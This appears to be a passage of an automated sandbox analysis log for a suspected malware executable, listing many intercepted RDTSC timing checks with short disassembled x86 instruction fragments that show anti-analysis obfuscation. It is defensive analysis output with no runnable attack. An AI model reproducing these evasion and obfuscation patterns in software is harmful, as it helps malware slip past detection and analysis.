Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B38216 second address: B3825D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 add dword ptr [esp], 2F746AEEh 0x0000000d mov edx, dword ptr [ebp+122D1934h] 0x00000013 push 00000003h 0x00000015 mov edi, dword ptr [ebp+122D2968h] 0x0000001b push 00000000h 0x0000001d jmp 00007FA3F4E971A3h 0x00000022 push 00000003h 0x00000024 mov dword ptr [ebp+122D1D9Dh], esi 0x0000002a call 00007FA3F4E97199h 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B3825D second address: B3826B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4513F2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B3826B second address: B38272 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B38272 second address: B382A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FA3F4513F39h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FA3F4513F2Fh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B382A5 second address: B38303 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c jmp 00007FA3F4E9719Eh 0x00000011 push eax 0x00000012 jmp 00007FA3F4E971A9h 0x00000017 pop eax 0x00000018 popad 0x00000019 mov eax, dword ptr [eax] 0x0000001b jmp 00007FA3F4E9719Bh 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FA3F4E971A3h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B38303 second address: B38307 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B38307 second address: B3830D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B3830D second address: B38335 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4513F2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a sub dword ptr [ebp+122D1D45h], ecx 0x00000010 lea ebx, dword ptr [ebp+1244EE2Dh] 0x00000016 movzx esi, bx 0x00000019 xchg eax, ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push esi 0x0000001f pop esi 0x00000020 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B38335 second address: B3834F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4E971A6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B3834F second address: B3836F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnc 00007FA3F4513F26h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FA3F4513F31h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B49D20 second address: B49D26 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B57E12 second address: B57E2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA3F4513F37h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B57E2D second address: B57E37 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA3F4E97196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B57FC5 second address: B57FD9 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA3F4513F26h 0x00000008 jnl 00007FA3F4513F26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pop edx 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B583B5 second address: B583BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FA3F4E97196h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B583BF second address: B583C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B583C3 second address: B583C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B583C9 second address: B583CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B583CF second address: B583D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B58547 second address: B5854D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B587B5 second address: B587D0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FA3F4E971A5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B587D0 second address: B587D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B587D6 second address: B587E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FA3F4E97196h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B587E0 second address: B587F9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 jmp 00007FA3F4513F2Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B58945 second address: B58969 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4E9719Ch 0x00000007 jmp 00007FA3F4E9719Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jo 00007FA3F4E9719Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B59314 second address: B59319 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B594A9 second address: B594AF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B594AF second address: B594B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B594B5 second address: B594D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4E971A7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B594D0 second address: B594E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FA3F4513F2Dh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B597AB second address: B597B1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B597B1 second address: B597B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B597B9 second address: B597BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B5BDE2 second address: B5BDE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B5BDE7 second address: B5BDFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4E971A1h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B5EFAF second address: B5EFB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B5EFB5 second address: B5EFBF instructions: 0x00000000 rdtsc 0x00000002 je 00007FA3F4E97196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B62E15 second address: B62E1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B62E1C second address: B62E31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4E9719Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6176E second address: B61783 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA3F4513F2Ah 0x00000010 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B61783 second address: B61788 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B63078 second address: B6307C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6307C second address: B63080 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B66340 second address: B66349 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B66349 second address: B6634D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6634D second address: B66359 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B66359 second address: B66379 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FA3F4E971A4h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B66379 second address: B66396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA3F4513F32h 0x00000009 jc 00007FA3F4513F26h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B69AF6 second address: B69B19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007FA3F4E971A6h 0x00000013 jmp 00007FA3F4E971A0h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B69B19 second address: B69C15 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA3F4513F2Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push esi 0x0000000f push ebx 0x00000010 jmp 00007FA3F4513F39h 0x00000015 pop ebx 0x00000016 pop esi 0x00000017 mov eax, dword ptr [eax] 0x00000019 jmp 00007FA3F4513F38h 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 jnc 00007FA3F4513F43h 0x00000028 pop eax 0x00000029 mov esi, dword ptr [ebp+122D29F8h] 0x0000002f call 00007FA3F4513F29h 0x00000034 pushad 0x00000035 pushad 0x00000036 jmp 00007FA3F4513F2Ah 0x0000003b push edi 0x0000003c pop edi 0x0000003d popad 0x0000003e pushad 0x0000003f jmp 00007FA3F4513F2Eh 0x00000044 jmp 00007FA3F4513F35h 0x00000049 popad 0x0000004a popad 0x0000004b push eax 0x0000004c jne 00007FA3F4513F32h 0x00000052 mov eax, dword ptr [esp+04h] 0x00000056 jmp 00007FA3F4513F32h 0x0000005b mov eax, dword ptr [eax] 0x0000005d jne 00007FA3F4513F32h 0x00000063 mov dword ptr [esp+04h], eax 0x00000067 push edi 0x00000068 pushad 0x00000069 push eax 0x0000006a push edx 0x0000006b rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6A04E second address: B6A052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6A052 second address: B6A056 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6A16B second address: B6A175 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FA3F4E97196h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6AA14 second address: B6AA18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6ACFE second address: B6AD02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6AE93 second address: B6AEA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007FA3F4513F2Ch 0x0000000f rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6AEA8 second address: B6AEEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FA3F4E97196h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007FA3F4E97198h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000018h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 or dword ptr [ebp+122D198Bh], ebx 0x0000002f push eax 0x00000030 pushad 0x00000031 push edx 0x00000032 ja 00007FA3F4E97196h 0x00000038 pop edx 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6AEEB second address: B6AEEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6BB73 second address: B6BB77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6BB77 second address: B6BB7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6BB7D second address: B6BB81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6D6AD second address: B6D6B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FA3F4513F26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6E1A6 second address: B6E1B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FA3F4E97196h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6E3D1 second address: B6E3D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6E3D7 second address: B6E400 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 mov dword ptr [esp], eax 0x00000009 mov dword ptr [ebp+122D3176h], ebx 0x0000000f push 00000000h 0x00000011 and si, 488Ch 0x00000016 push 00000000h 0x00000018 mov edi, dword ptr [ebp+122D3569h] 0x0000001e mov si, 3255h 0x00000022 xchg eax, ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6E400 second address: B6E406 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6E406 second address: B6E40B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6ECF0 second address: B6ECFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FA3F4513F26h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B71F43 second address: B71FC5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA3F4E971A1h 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007FA3F4E97198h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000015h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 je 00007FA3F4E9719Ch 0x0000002f mov dword ptr [ebp+122D1F04h], edx 0x00000035 push 00000000h 0x00000037 mov edi, dword ptr [ebp+12453537h] 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push ebp 0x00000042 call 00007FA3F4E97198h 0x00000047 pop ebp 0x00000048 mov dword ptr [esp+04h], ebp 0x0000004c add dword ptr [esp+04h], 00000014h 0x00000054 inc ebp 0x00000055 push ebp 0x00000056 ret 0x00000057 pop ebp 0x00000058 ret 0x00000059 and ebx, 4ADF5E20h 0x0000005f push edx 0x00000060 mov dword ptr [ebp+12452727h], ebx 0x00000066 pop ebx 0x00000067 push eax 0x00000068 push ebx 0x00000069 push eax 0x0000006a push edx 0x0000006b jc 00007FA3F4E97196h 0x00000071 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B71FC5 second address: B71FC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B70D67 second address: B70D6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B730B5 second address: B730B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B730B9 second address: B730BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B721F2 second address: B7220C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4513F2Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007FA3F4513F26h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B730BF second address: B730D0 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA3F4E97198h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push esi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B74150 second address: B741C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 push eax 0x00000007 jnp 00007FA3F4513F2Ah 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007FA3F4513F28h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 jmp 00007FA3F4513F32h 0x0000002d mov dword ptr [ebp+1247B03Ch], esi 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push eax 0x00000038 call 00007FA3F4513F28h 0x0000003d pop eax 0x0000003e mov dword ptr [esp+04h], eax 0x00000042 add dword ptr [esp+04h], 00000014h 0x0000004a inc eax 0x0000004b push eax 0x0000004c ret 0x0000004d pop eax 0x0000004e ret 0x0000004f push 00000000h 0x00000051 mov ebx, dword ptr [ebp+12474141h] 0x00000057 xchg eax, esi 0x00000058 pushad 0x00000059 jc 00007FA3F4513F2Ch 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B73303 second address: B73309 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B741C9 second address: B741D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B7433D second address: B74342 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B743F7 second address: B743FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B772D5 second address: B772F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4E971A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B7645A second address: B76460 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B772F8 second address: B772FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B772FC second address: B77300 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B76460 second address: B76472 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007FA3F4E97196h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B76472 second address: B7648A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4513F30h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B7648A second address: B7648E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
